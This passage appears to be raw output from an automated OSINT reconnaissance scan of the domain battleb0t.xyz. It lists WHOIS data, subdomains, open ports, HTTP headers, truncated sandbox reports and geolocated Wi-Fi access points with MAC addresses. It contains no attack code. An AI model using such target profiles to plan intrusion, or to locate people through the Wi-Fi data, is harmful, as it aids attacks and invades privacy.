to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | iskorpit (Net ID: 00:15:D0:36:48:62) | 40.2024, 29.0398 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 19 | 0 | 1 | 0 | None | fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:49:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cytoscape.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5168:120:WilError_01"\n "Local\\SM0:2368:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:2368:120:WilError_01"\n "Local\\SM0:2368:120:WilError_01"\n "SM0:2368:304:WilStaging_02"\n "Local\\SM0:5168:304:WilStaging_02"\n "SM0:5168:304:WilStaging_02"\n "SM0:5168:120:WilError_01"\n "Local\\SM0:5168:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5168:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5168:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5168:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "69.16.175.42:443"\n "104.18.11.207:443"\n "142.250.191.46:443"\n "142.250.188.14:443"\n "52.10.229.192:443"\n "192.229.210.155:443"\n "192.229.163.25:443"\n "142.250.189.238:443"\n 
"142.251.214.142:443"\n "142.250.188.8:443"\n "108.138.246.126:443"\n "142.250.188.13:443"\n "142.251.46.227:443"\n "18.155.202.52:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"abs.twimg.com"\n "cytoscape.org"\n "home.ndexbio.org"\n "syndication.twitter.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"syndication.twitter.com" (Indicator: "twitter")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005168]\n "f_00024d" has type "gzip compressed data max compression original size modulo 2^32 258173"- [targetUID: N/A]\n "f_000268" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 360x353 components 3"- [targetUID: N/A]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.json]- [targetUID: 00000000-00005168]\n "0bb730fb-1fbe-4afa-904a-b584b39204fd.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original 
size modulo 2^32 2253262"- Location: [%TEMP%\\0bb730fb-1fbe-4afa-904a-b584b39204fd.tmp]- [targetUID: 00000000-00005168]\n "3b5c0edd43425875_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "PNG image data 380 x 122 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "68e6dbb3-f4d1-41b2-92aa-03d128f088dc.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\68e6dbb3-f4d1-41b2-92aa-03d128f088dc.tmp]- [targetUID: 00000000-00005296]\n "f_000243" has type "PNG image data 2422 x 1838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 380 x 168 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00005296]\n "b227a39674051662_0" has type "data"- [targetUID: N/A]\n "5b1db3ddc4fa4aec_0" has type "data"- [targetUID: N/A]\n "1c5433fc0e218662_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\1c5433fc0e218662_0]- [targetUID: 00000000-00005168]\n "00ed96a6-c8b3-4034-8071-093867526c70.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\00ed96a6-c8b3-4034-8071-093867526c70.tmp]- [targetUID: 00000000-00005168]\n "d0e3a151e37a5784_0" has type "data"- [targetUID: N/A]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003264]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://cytoscape.org/"\n Heuristic match: "abs.twimg.com"\n Pattern match: "https://creativecommons.org/"\n Heuristic match: "cytoscape.org"\n Heuristic match: "home.ndexbio.org"\n Pattern match: "https://cytoscape.org"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "syndication.twitter.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Heuristic match: "ytoscape.org"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.46"\n "UDP connection to 142.250.188.14"\n "UDP connection to 
142.251.214.142"\n "UDP connection to 142.250.188.8"\n "UDP connection to 142.251.46.227"\n "UDP connection to 142.250.189.238"\n "UDP connection to 172.217.12.99"\n "UDP connection to 142.251.32.34"\n "UDP connection to 142.251.32.42"\n "UDP connection to 142.250.188.1"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\5168_407672804\\adblock_snippet.js]- [targetUID: 00000000-00005168]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n "192.168.241.102"\n Potential IP "5.1.0.0" found in string 
"Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'642262aa36c72290dd02ee4c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_a | 185.199.110.153 |
| 2023-05-12 02:49:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-3178248.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base a87d0000\n "msedge.exe" loaded module "COMBASE.DLL" at base ad600000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 8fcd0000\n "msedge.exe" loaded module "NTDLL.DLL" at base ade40000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base ad520000\n "msedge.exe" loaded module "SHELL32.DLL" at base ab320000\n "msedge.exe" loaded module "USER32.DLL" at base ac820000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base aa240000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base ad060000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base aa240000\n "msedge.exe" loaded module "KERNEL32" at base ac770000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base aa240000\n "msedge.exe" loaded module "C:\\PROGRAM FILES 
(X86)\\MICROSOFT\\EDGE\\APPLICATION\\103.0.1264.37\\MSEDGE.DLL" at base 79080000\n "msedge.exe" loaded module "KERNEL32.DLL" at base ac770000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.30.148:443"\n "185.199.110.153:443"\n "104.17.24.14:443"\n "65.8.158.45:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"\n "O@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3784:120:WilError_01"\n "Local\\SM0:3784:304:WilStaging_02"\n "Local\\SM0:3784:120:WilError_01"\n "SM0:3784:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3784:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00003784]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003784]\n "f213a3bc-fbce-4ad6-a09e-bbb499aa704f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f213a3bc-fbce-4ad6-a09e-bbb499aa704f.tmp]- [targetUID: 00000000-00003784]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003784]\n "e3e444f5-3bdf-46db-9837-c7ba81a12151.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3e444f5-3bdf-46db-9837-c7ba81a12151.tmp]- [targetUID: 00000000-00003784]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\3784_1455271828\\shopping_fre.html]- [targetUID: 00000000-00003784]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00003784]\n "Filtering Rules" has type "data"- Location: 
| 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:AA:8C:9E) | 41.8781, -87.6298 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-github-request-id: 69FA:0168:26C3619:3A6662D:645DAA55 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:12 | HTTP Status Code | No | Web Spider | 0 | 0 | 1 | 0 | None | 200 | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CoxWiFi (Net ID: 00:0D:67:8C:21:AC) | 39.0469, -77.4903 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 5 | 0 | 3 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU | https://www.ayhu.xyz/ |
| 2023-05-12 02:57:23 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | portainer.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:94:30:70) | 41.8781, -87.6298 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PHK140 (Net ID: 00:01:E3:04:F3:9A) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_phone (Net ID: 00:0C:E6:C9:2D:E3) | 50.8897, 6.0563 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1C:17:A0) | 52.3759, 4.8975 |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:443 | 188.114.97.0/24 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.109.0/24 |
| 2023-05-12 03:11:16 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'London', u'security': {u'is_vpn': False}, u'city_geoname_id': 2643743, u'region_geoname_id': 6269131, u'country': u'United States', u'region': u'England', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'CloudFLARENET-EU', u'organization_name': None, u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'W1B', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'22:11:15'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2a06:98c1:3120::1', u'continent': u'North America', u'region_iso_code': u'ENG'} | 2a06:98c1:3120::1 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:22 | 64.226.81.43 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 10 | 0 | 1 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} | ayhu.xyz |
| 2023-05-12 02:54:38 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | 
"youshareproject.com", "arpaman.ga", "sgenundia.tk", "tiabolihochwildpa.tk", "cienciaexamanismo.com.br", "yarmun.ru", "powernet.asia", "marchailil.gq", "cpanel.dailytungipara.com", "rigophogisvito.tk", "control.vipe.us", "aphausomaharli.gq", "rensumexiberk.ml", "www.septlightchristministries.org", "vikk-play.space", "www.terrtus.ch", "cvgy.top", "5000miles.org", "www.bre | 172.67.168.252 |
| 2023-05-12 02:56:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None |  | 35.229.48.116 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/gp_badge.png | https://fluid.battleb0t.xyz/ |
| 2023-05-12 02:51:15 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None |  | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605ceb464381-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:55:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:03.171 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
